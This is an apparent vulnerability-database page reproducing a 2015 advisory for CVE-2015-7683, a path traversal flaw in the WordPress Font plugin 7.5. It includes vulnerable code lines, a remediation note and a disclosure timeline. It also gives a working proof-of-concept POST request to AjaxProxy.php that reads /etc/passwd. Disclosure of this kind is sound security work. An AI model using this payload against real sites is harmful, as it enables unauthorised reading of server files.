Vulners
Lucene search
WordPress Font 7.5 Path Traversal
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | WordPress Font 7.5 Path Traversal Vulnerability | 13 Oct 201500:00 | – | zdt |
 | WordPress Font plugin path traversal vulnerability | 13 Oct 201500:00 | – | cnvd |
 | CVE-2015-7683 | 16 Oct 201520:00 | – | cve |
 | CVE-2015-7683 | 16 Oct 201520:00 | – | cvelist |
 | EUVD-2015-7585 | 7 Oct 202500:30 | – | euvd |
 | CVE-2015-7683 | 16 Oct 201520:59 | – | nvd |
 | WordPress Font Plugin <= 7.5.0 - Absolute Path Traversal | 2 Oct 201500:00 | – | patchstack |
 | Path traversal | 16 Oct 201520:59 | – | prion |
 | CVE-2015-7683: Absolute Path Traversal in the Font WordPress Plugin | 26 Oct 201500:00 | – | securityvulns |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 26 Oct 201500:00 | – | securityvulns |
10
`
Details
================
Software: Font
Version: 7.5
Homepage: https://wordpress.org/plugins/font/
CVE: CVE-2015-7683 (Pending)
CVSS: 6.3 (Medium; AV:N/AC:M/Au:S/C:C/I:N/A:N)
CWE: CWE-22
Description
================
An absolute path traversal vulnerability in Font 7.5 allows WordPress admins read access to system files such as /etc/passwd. Font is a WordPress plugin with over 40,000 active installs.
Vulnerability
================
The vulnerability is due to the unsanitized POST parameter 'url' being passed to file_get_contents() via file_get_contents2().
>From font/Font.php:
139: $contents = $this->file_get_contents2($_POST['url'], array_merge($dataArr, $serializedArr));
. . .
515: function file_get_contents2($src, $postData = false) {
. . .
550: $fileContents = @file_get_contents($src, false, $context);
Proof of Concept
================
URL: http://localhost/wordpress/wp-content/plugins/font/AjaxProxy.php
POST data:
url=/etc/passwd&data%5Bblogurl%5D=http%3A%2F%2Flocalhost%2Fwordpress&data%5Bversion%5D=7.5&format=json&action=cross_domain_request
Remediation
================
Upgrade the plugin to version 7.5.1 or higher.
Timeline
================
2015-09-29: Discovered
2015-09-30: Contacted vendor via plugin support form
2015-10-01: Reported vulnerability to wordpress.org
2015-10-02: CVE-2015-7683 assigned
2015-10-04: Vendor releases version 7.5.1 - confirmed fixed
2015-10-12: Public Disclosure
References
================
[1] https://cwe.mitre.org/data/definitions/22.html
Discovered by
================
David Moore @grajagandev
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Oct 2015 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.00272